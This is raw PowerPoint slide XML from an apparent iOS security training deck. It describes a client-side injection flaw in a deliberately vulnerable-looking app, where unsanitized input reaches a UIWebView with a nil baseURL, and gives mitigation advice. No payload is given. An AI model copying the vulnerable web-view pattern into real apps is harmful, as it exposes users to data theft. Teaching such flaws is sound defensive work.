            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Injection/Controller/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ClientSideInjectionDetailViewController.swift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IBOutlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UIWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Donate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Controller/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DonateDetailsViewController.swift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>webView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WKWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48DBB506-97B1-47D7-86A7-BC076ADC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556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9" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48DBB506-97B1-47D7-86A7-BC076ADC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D5A9B1B-1B41-6BF1-D55D-B67B86DCA34C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="1415376"/>
            <a:ext cx="7239000" cy="4774789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1878876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lgn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>concatenated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Further</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>webView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>baseURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>nil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>higher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>hence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>enabling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> data exfiltration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the phone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Please</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> issue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in part possible due to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>fact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>WebKitAllowUniversalAccessFromFileURLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>WebKitAllowFileAccessFromFileURLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>turned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on by default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>UWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>disabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> by default on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WKWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> possible to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>turn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>manually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>UlWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>however</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> user input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>prior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>concatenation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>turning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> off JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>entirely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>UlWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>View</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>needs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>replaced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>newer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>safer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>WKWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>View</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.allysonomalley.com/2018/12/03/ios-bug-hunting-web-view-xss/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.apple.com/documentation/uikit/uiwebview</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://developer.apple.com/documentation/webkit/wkwebview</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://stackoverflow.com/questions/48835813/can-i-disable-js-in-a-uiwebview-objective-c</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://stackoverflow.com/questions/33828064/ios-web-view-javascript-disable?1q=1</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" i="1"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9" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Blois">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48DBB506-97B1-47D7-86A7-BC076ADCD9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979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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Recommendations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WKWebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>UIWebView</a:t>
            </a:r>
